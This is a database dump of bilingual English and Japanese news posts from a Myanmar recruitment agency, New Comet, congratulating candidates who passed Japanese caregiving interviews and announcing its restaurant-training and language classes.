('activities', 0, 137, 573, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます</p><ul><li>NANG BWAR KYI</li><li>PHRAY MYAR</li><li>KAW MYAR</li></ul><p>秋田県で働くための TOKUTEI KAIGO の面接に合格しました!</p><img src=\"/sites/default/files/inline-images/KAW%20MYAR_0.jpg\" data-entity-uuid=\"7f53d639-b584-4ee0-b277-c440cdca648c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NAN%20BWAR%20KYI_0.jpg\" data-entity-uuid=\"c03f9127-c9cd-4498-a15f-ca1164aae27e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/PHRAY%20MYAR.jpg\" data-entity-uuid=\"6631104e-9fd6-45e0-b354-c85cb8a506d3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 138, 575, 'en', 0, '<blockquote><h2>1st Batch Speaking and Pratical Class Completion</h2></blockquote><p>At New Comet Agency, candidates preparing for Tokutei Gaishoku (restaurant) interviews receive instruction from experienced teachers through small group activities and written exercises. This approach ensures that successful candidates not only pass through New Comet but also gain practical speaking skills and relevant experience.Moreover, to alleviate language apprehension in foreign environments, we offer small Kaiwa (conversation) classes facilitated by native speakers to practice Japanese accents.Currently, our priority is to support interview-passers by mitigating potential challenges they may encounter.</p><img data-entity-uuid=\"33f710f1-5bc7-4953-b3a1-647e720033bb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-3db9f1e152ae40301bf405613f7fc81da76de2bae6a9bc2d831f3bf2098e3250_52ed44063c111889.jpg\"><img data-entity-uuid=\"56f49323-5396-464d-87d3-c53de426a854\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-29abc5f252e55a8d95cfc21e8d3e1e89ff008af97840dc9ea94439dcb8c1eea8_48eefd971798704f.jpg\"><img data-entity-uuid=\"ee9c451d-645e-41e3-9d74-50cd0e4db3cd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-93dd603e1138ce4c2847f2374b6685bf6a93e845c13d0a3d88517892615ee3f8_df8fe7fcd11e5c88.jpg\"><img data-entity-uuid=\"b9e7e674-f81e-44b8-bd2a-f713827ea67f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-726cd799088309125071ada3493c8916f09a9a3d4dcc1d1c648e9fba28d4b86b_18a17c8d2b659cb2.jpg\"><img data-entity-uuid=\"a391f211-0fe9-4a2f-9ada-b69aad45aa2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-78854bc3e37663c1d709d4ead49f9deac1a95b3cf1a4c3ef6c1b30bb62da47b4_b45383810d3befe5.jpg\"><img data-entity-uuid=\"98aeb3b5-9a9f-4098-b224-4b0617f588ea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59a39b0db5a48f439f63370be80340d1135254e5e148839febceb9671221a5c_4779530b8c62bd68.jpg\"><img data-entity-uuid=\"318bdaed-2485-4a85-a845-556e6bdeeef6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f59e6582577d6d68dd96f767e18c949ad4dff7c621015a53de567f7259ccadd8_69b48dc6c8534d76.jpg\"><img data-entity-uuid=\"e962ee0c-3e11-461f-80a5-8237f400c650\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-f2746a0f468e5c40d02bcc22d7554498d15ff418240398570de70d844f402b80_19733c8ce43833e7.jpg\">', '', 'full_html'),
('activities', 0, 138, 575, 'ja', 0, '<blockquote><h2>第 1 バッチのスピーキングと実技クラス修了</h2><p>ニューコメット エージェンシーでは、特定外食 (レストラン) 面接の準備をしている候補者は、小グループ活動や筆記練習を通じて経験豊富な講師から指導を受けます。このアプローチにより、合格者はニューコメットに合格するだけでなく、実践的なスピーキング スキルと関連経験も身に付けることができます。さらに、外国の環境での言語不安を軽減するために、ネイティブ スピーカーが日本語のアクセントを練習する少人数制の会話クラスを提供しています。現在、私たちの優先事項は、面接合格者が遭遇する可能性のある潜在的な課題を軽減してサポートすることです。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3db9f1e152ae40301bf405613f7fc81da76de2bae6a9bc2d831f3bf2098e3250_52ed44063c111889.jpg\" data-entity-uuid=\"33f710f1-5bc7-4953-b3a1-647e720033bb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-29abc5f252e55a8d95cfc21e8d3e1e89ff008af97840dc9ea94439dcb8c1eea8_48eefd971798704f.jpg\" data-entity-uuid=\"56f49323-5396-464d-87d3-c53de426a854\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-93dd603e1138ce4c2847f2374b6685bf6a93e845c13d0a3d88517892615ee3f8_df8fe7fcd11e5c88.jpg\" data-entity-uuid=\"ee9c451d-645e-41e3-9d74-50cd0e4db3cd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-726cd799088309125071ada3493c8916f09a9a3d4dcc1d1c648e9fba28d4b86b_18a17c8d2b659cb2.jpg\" data-entity-uuid=\"b9e7e674-f81e-44b8-bd2a-f713827ea67f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-78854bc3e37663c1d709d4ead49f9deac1a95b3cf1a4c3ef6c1b30bb62da47b4_b45383810d3befe5.jpg\" data-entity-uuid=\"a391f211-0fe9-4a2f-9ada-b69aad45aa2c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f59a39b0db5a48f439f63370be80340d1135254e5e148839febceb9671221a5c_4779530b8c62bd68.jpg\" data-entity-uuid=\"98aeb3b5-9a9f-4098-b224-4b0617f588ea\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f59e6582577d6d68dd96f767e18c949ad4dff7c621015a53de567f7259ccadd8_69b48dc6c8534d76.jpg\" data-entity-uuid=\"318bdaed-2485-4a85-a845-556e6bdeeef6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f2746a0f468e5c40d02bcc22d7554498d15ff418240398570de70d844f402b80_19733c8ce43833e7.jpg\" data-entity-uuid=\"e962ee0c-3e11-461f-80a5-8237f400c650\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 139, 577, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to HNIN WAH KHAING &amp; LAY LAY NAING for passing the Interview for TOKUTEI KAIGO to work at AKITA Prefecture, JAPAN!&nbsp;</p><img data-entity-uuid=\"28362b21-6b14-4783-8093-84b7f8766272\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/HNIN%20WAH%20KHAING_0.jpg\"><img data-entity-uuid=\"2fe33baf-5da2-4bd0-9f6c-db7463491c6c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/LAY%20LAY%20NAING_0.jpg\">', '', 'full_html'),
('activities', 0, 139, 577, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>HNIN WAH KHAING さん</strong>と <strong>LAY LAY NAING さん</strong>が、秋田県で働くための TOKUTEI KAIGO の面接に合格しました。おめでとうございます!</p><img src=\"/sites/default/files/inline-images/HNIN%20WAH%20KHAING_0.jpg\" data-entity-uuid=\"28362b21-6b14-4783-8093-84b7f8766272\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/LAY%20LAY%20NAING_0.jpg\" data-entity-uuid=\"2fe33baf-5da2-4bd0-9f6c-db7463491c6c\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 140, 579, 'en', 0, '<blockquote><h2>1st Batch Theoretical Class For 15 Students</h2></blockquote><div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-11\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"7ccdedbb-c0ce-4970-8404-33a9702e7c83\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>Congratulations to all the children who have successfully passed the restaurant interview! In the new year, practical training will commence for 15 children based on the principles of success. Your hard work has paid off, and we commend your achievements. As you prepare to embark on this journey, we encourage you to continue your dedication. The classes are designed to equip you with essential workplace skills, so attendance is crucial. We look forward to seeing your continued progress and success in Japan.</p><img data-entity-uuid=\"652fd1b8-ec3f-4136-abb6-6af35c9c5874\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-45c4e9e998df6671bd77e672d9292fbee765ea62536ec837a00765efce79fc7e_c1fdb88868297dba.jpg\"><img data-entity-uuid=\"84103d30-1c8c-4a95-a703-5391e41d952d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-51ec7f4be81257f4ff2f721c5e084cb4cc382b2ec8cfcecae01d41a9e7c09e03_4b7c3a49166d492a.jpg\"><img data-entity-uuid=\"ea362f9f-07a8-43d7-904b-2d6cd4a8153b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-69d282081f3119be288d94bc0b4bb61ad1f17e8eaed3c08ca009c6a4de5dc75d_1383d6ddf8fe814d.jpg\"><img data-entity-uuid=\"177fde09-e74e-4cdf-80b2-3256275746b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-724f082ab41be8e90d111399939af2f3d1a97e05877c69bff3284b02b5e1e4dd_5a389926988927bf.jpg\"><img data-entity-uuid=\"e394765a-6b85-4041-b003-780d2cdd58df\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-8033bc061c22ecda23a89cf99e7992d6788c3646c3972cfa22bcb78eddde2fd6_fc06ba5dae001c97.jpg\"><img data-entity-uuid=\"4404215d-4446-4952-b7fa-5cfe1f9d033b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-dad82938c3dc5bcbb853785ca4f388b1d3b1e5037a480a3ae260f8f6dee0ccea_42f956a550769234.jpg\"><img data-entity-uuid=\"23e3cb3a-b366-49e5-9456-59fe851e2a7e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-01-e6873cecbff4a19760cd209a7c4637d87ccaa857f5e00cf4acc717ab93afbe9f_fdb5e83019029c3c.jpg\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"flex w-full items-start gap-4 rounded-2xl border border-token-border-light bg-token-main-surface-primary py-4 pl-5 pr-3 text-sm text-token-text-primary [text-wrap:pretty] dark:border-transparent dark:bg-token-main-surface-secondary md:items-center lg:mx-auto shadow-xxs\"><div class=\"mt-1.5 flex grow flex-col items-start gap-4 md:mt-0 md:flex-row md:items-center md:justify-between md:gap-8\"><div class=\"flex max-w-md flex-col\"><div class=\"\">&nbsp;</div></div></div></div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 140, 579, 'ja', 0, '<div class=\"flex-1 overflow-hidden\"><div class=\"h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-79elbk h-full\"><div class=\"react-scroll-to-bottom--css-swlfp-1n7m0yu\"><div class=\"flex flex-col text-sm\"><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-11\" data-scroll-anchor=\"true\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"7ccdedbb-c0ce-4970-8404-33a9702e7c83\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><blockquote><h2>15 名の生徒を対象とした第 1 バッチ理論クラス</h2></blockquote><p>レストラン面接に合格したすべての生徒の皆さん、おめでとうございます。新年には、成功の原則に基づいた 15 名の生徒を対象とした実習が始まります。皆さんの努力は報われ、私たちは皆さんの成果を称賛します。この旅に出発する準備をしながら、献身的な姿勢を続けてください。クラスは、職場で必須のスキルを身に付けるように設計されているため、出席は非常に重要です。日本での皆さんの継続的な進歩と成功を期待しています。</p><img src=\"/sites/default/files/inline-images/0-02-01-45c4e9e998df6671bd77e672d9292fbee765ea62536ec837a00765efce79fc7e_c1fdb88868297dba.jpg\" data-entity-uuid=\"652fd1b8-ec3f-4136-abb6-6af35c9c5874\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-51ec7f4be81257f4ff2f721c5e084cb4cc382b2ec8cfcecae01d41a9e7c09e03_4b7c3a49166d492a.jpg\" data-entity-uuid=\"84103d30-1c8c-4a95-a703-5391e41d952d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-69d282081f3119be288d94bc0b4bb61ad1f17e8eaed3c08ca009c6a4de5dc75d_1383d6ddf8fe814d.jpg\" data-entity-uuid=\"ea362f9f-07a8-43d7-904b-2d6cd4a8153b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-724f082ab41be8e90d111399939af2f3d1a97e05877c69bff3284b02b5e1e4dd_5a389926988927bf.jpg\" data-entity-uuid=\"177fde09-e74e-4cdf-80b2-3256275746b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8033bc061c22ecda23a89cf99e7992d6788c3646c3972cfa22bcb78eddde2fd6_fc06ba5dae001c97.jpg\" data-entity-uuid=\"e394765a-6b85-4041-b003-780d2cdd58df\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dad82938c3dc5bcbb853785ca4f388b1d3b1e5037a480a3ae260f8f6dee0ccea_42f956a550769234.jpg\" data-entity-uuid=\"4404215d-4446-4952-b7fa-5cfe1f9d033b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-e6873cecbff4a19760cd209a7c4637d87ccaa857f5e00cf4acc717ab93afbe9f_fdb5e83019029c3c.jpg\" data-entity-uuid=\"23e3cb3a-b366-49e5-9456-59fe851e2a7e\" data-entity-type=\"file\"></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div><div class=\"mt-3 w-full empty:hidden\"><div class=\"text-center\">&nbsp;</div></div></div><div class=\"absolute\"><span class=\"\" data-state=\"closed\"><button class=\"btn relative btn-secondary btn-small shadow-lg\"><div class=\"flex items-center justify-center\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md\"><path fill=\"currentColor\" d=\"M7.5 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.514 2.79a1 1 0 0 0 .283 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7M16.18 13.25c.487 0 .95-.1 1.372-.28-.41 1.078-1.247 2.61-2.513 2.79a1 1 0 0 0 .282 1.98c2.553-.365 4.085-3.269 4.528-5.55.243-1.248.217-2.609-.32-3.743-.607-1.282-1.926-2.203-3.364-2.197a3.5 3.5 0 0 0 .015 7\"></path></svg></div></button></span></div></div></div></div></div></div></div></div></div></div><div class=\"w-full md:pt-0 dark:border-white/20 md:border-transparent md:dark:border-transparent md:w-[calc(100%-.5rem)] juice:w-full\"><div class=\"px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><form class=\"w-full\" type=\"button\" aria-haspopup=\"dialog\" aria-expanded=\"false\" aria-controls=\"radix-:r1:\" data-state=\"closed\"><div class=\"relative flex h-full max-w-full flex-1 flex-col\"><div class=\"absolute bottom-full left-0 right-0 z-20\"><div class=\"relative h-full w-full\"><div class=\"flex flex-col gap-3.5 pb-3.5 pt-2\"><div class=\"flex w-full items-start gap-4 rounded-2xl border border-token-border-light bg-token-main-surface-primary py-4 pl-5 pr-3 text-sm text-token-text-primary [text-wrap:pretty] dark:border-transparent dark:bg-token-main-surface-secondary md:items-center lg:mx-auto shadow-xxs\"><div class=\"mt-1.5 flex grow flex-col items-start gap-4 md:mt-0 md:flex-row md:items-center md:justify-between md:gap-8\"><div class=\"flex max-w-md flex-col\"><div class=\"\">&nbsp;</div></div></div></div></div></div></div></div></form></div></div></div>', '', 'full_html'),
('activities', 0, 141, 581, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations to EI EI NYEIN, THU ZAR AUNG, BUE MYAR SHAR for passing the Interview for TOKUTEI KAIGO at AKITA Prefecture in JAPAN!&nbsp;</p><img src=\"/sites/default/files/inline-images/BUE%20MYAR%20SHAR.jpg\" data-entity-uuid=\"f4e35c2e-f7b7-41d2-9c61-bc7879ffaa88\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20EI%20NYEIN_0.jpg\" data-entity-uuid=\"3488084a-8efc-4296-9e51-bf1c9f6c70e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THU%20ZAR%20AUNG.jpg\" data-entity-uuid=\"ba20b099-3864-49d5-b059-9e96580d768a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 141, 581, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>EI EI NYEINさん</strong>、<strong>THU ZAR AUNGさん</strong>、BUE MYAR SHARさんが秋田県の特定介護の面接に合格しました、おめでとうございます!</p><img src=\"/sites/default/files/inline-images/BUE%20MYAR%20SHAR.jpg\" data-entity-uuid=\"f4e35c2e-f7b7-41d2-9c61-bc7879ffaa88\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/EI%20EI%20NYEIN_0.jpg\" data-entity-uuid=\"3488084a-8efc-4296-9e51-bf1c9f6c70e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/THU%20ZAR%20AUNG.jpg\" data-entity-uuid=\"ba20b099-3864-49d5-b059-9e96580d768a\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 142, 583, 'en', 0, '<blockquote><h2>Commencement Of New Comet Language Centre</h2></blockquote><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-13\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"group/conversation-turn relative flex w-full min-w-0 flex-col agent-turn\"><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"assistant\" data-message-id=\"409c4610-442f-4274-9140-054f09750c0a\" dir=\"auto\"><div class=\"markdown prose w-full break-words dark:prose-invert light\"><p>The new year has begun with the introduction of a new N5 class, who are already preparing for the July N4 exam. Classes will be held daily, with regular assessments. From Monday to Thursday, one lesson will be conducted each day, and over the weekend (Friday to Sunday), we plan to reinforce learning through PopQuiz sessions to keep students engaged and avoid monotony in homework.As the school is affiliated with our agency, completing the course eliminates the need for students to seek interviews independently. Current Gaishoku candidates are equipped with essential knowledge through practical instruction by our teachers before their arrival in Japan.Students are responsible for adhering to their daily study routines, while we oversee the curriculum and facilitate their transition to Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-0d82578e4eeb95d45b3aea58a31107f4e9c7d0d57db6f2e0574c644b16cd5938_e03eefd818751014.jpg\" data-entity-uuid=\"f5371587-116f-4dac-879a-34801cef5949\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1f139d1e488c49efedfad0063e5adb305fab7ea9b3724aead3dd0aa73bbea6a3_af144a595daab05e.jpg\" data-entity-uuid=\"5c9a38b1-b151-4d2a-85ae-638b9f1bd956\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4db89c7fb62a68759df9f4c1c421f10a418b7580ebe4baa7cd98a002d77c999e_d43d0c99d892dd0d.jpg\" data-entity-uuid=\"924820ef-7e98-4c7d-9106-32fae2827884\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-9aa16490a0b9226fe9b699d6c68553737d2095b7aed085bde1f659dbef90491b_a4dd5e0651b48b68.jpg\" data-entity-uuid=\"3836ec4e-123f-431b-8b58-96e7f9419c3d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-90fa91b1bec3ee89f057af76501a016c3ab6ec0c82a9774b2f3bc99ee300f8bf_56859cbe57067f4a.jpg\" data-entity-uuid=\"8bb4a31e-57a7-4a68-adbc-d48eb54b3c39\" data-entity-type=\"file\"><p>&nbsp;</p></div></div></div><div class=\"mt-1 flex gap-3 empty:hidden juice:-ml-3\"><div class=\"-ml-1 mt-0 flex h-7 items-center justify-center gap-[2px] self-end text-gray-400 lg:justify-start lg:self-center visible\"><span class=\"\" data-state=\"closed\"><button class=\"rounded-md p-1 text-token-text-tertiary hover:text-token-text-primary\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\" class=\"icon-md-heavy\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M7 5a3 3 0 0 1 3-3h9a3 3 0 0 1 3 3v9a3 3 0 0 1-3 3h-2v2a3 3 0 0 1-3 3H5a3 3 0 0 1-3-3v-9a3 3 0 0 1 3-3h2zm2 2h5a3 3 0 0 1 3 3v5h2a1 1 0 0 0 1-1V5a1 1 0 0 0-1-1h-9a1 1 0 0 0-1 1zM5 9a1 1 0 0 0-1 1v9a1 1 0 0 0 1 1h9a1 1 0 0 0 1-1v-9a1 1 0 0 0-1-1z\" clip-rule=\"evenodd\"></path></svg></button></span></div></div><div class=\"pr-2 lg:pr-0\">&nbsp;</div></div></div></div></div></div><div class=\"w-full text-token-text-primary\" dir=\"auto\" data-testid=\"conversation-turn-14\" data-scroll-anchor=\"false\"><div class=\"py-2 juice:py-[18px] px-3 text-base md:px-4 m-auto md:px-5 lg:px-1 xl:px-5\"><div class=\"mx-auto flex flex-1 gap-3 text-base juice:gap-4 juice:md:gap-5 juice:lg:gap-6 md:max-w-3xl lg:max-w-[40rem] xl:max-w-[48rem]\"><div class=\"flex-shrink-0 flex flex-col relative items-end\"><div><div class=\"pt-0.5 juice:pt-0\"><div class=\"gizmo-shadow-stroke flex h-6 w-6 items-center justify-center overflow-hidden rounded-full juice:h-8 juice:w-8\"><div class=\"overflow-hidden rounded-full\"><div class=\"relative flex items-center justify-center bg-blue-300 text-white h-full w-full text-xs\"><svg class=\"icon-sm\" xmlns=\"http://www.w3.org/2000/svg\" width=\"24\" height=\"24\" fill=\"none\" viewBox=\"0 0 24 24\"><path fill=\"currentColor\" fill-rule=\"evenodd\" d=\"M12 4a3 3 0 1 0 0 6 3 3 0 0 0 0-6M7 7a5 5 0 1 1 10 0A5 5 0 0 1 7 7m5 8c-3.656 0-6.5 2.75-6.5 6a1 1 0 1 1-2 0c0-4.482 3.872-8 8.5-8s8.5 3.518 8.5 8a1 1 0 1 1-2 0c0-3.25-2.844-6-6.5-6\" clip-rule=\"evenodd\"></path></svg></div><div class=\"flex-col gap-1 md:gap-3\"><div class=\"flex flex-grow flex-col max-w-full\"><div class=\"min-h-[20px] text-message flex flex-col items-start whitespace-pre-wrap break-words [.text-message+&amp;]:mt-5 juice:w-full juice:items-end overflow-x-auto gap-3\" data-message-author-role=\"user\" data-message-id=\"aaa2496d-8022-456b-a68f-9edc75f88c0f\" dir=\"auto\"><div class=\"relative max-w-[70%]\"><div>&nbsp;</div></div></div></div></div></div></div></div></div></div></div></div></div>', '', 'full_html'),
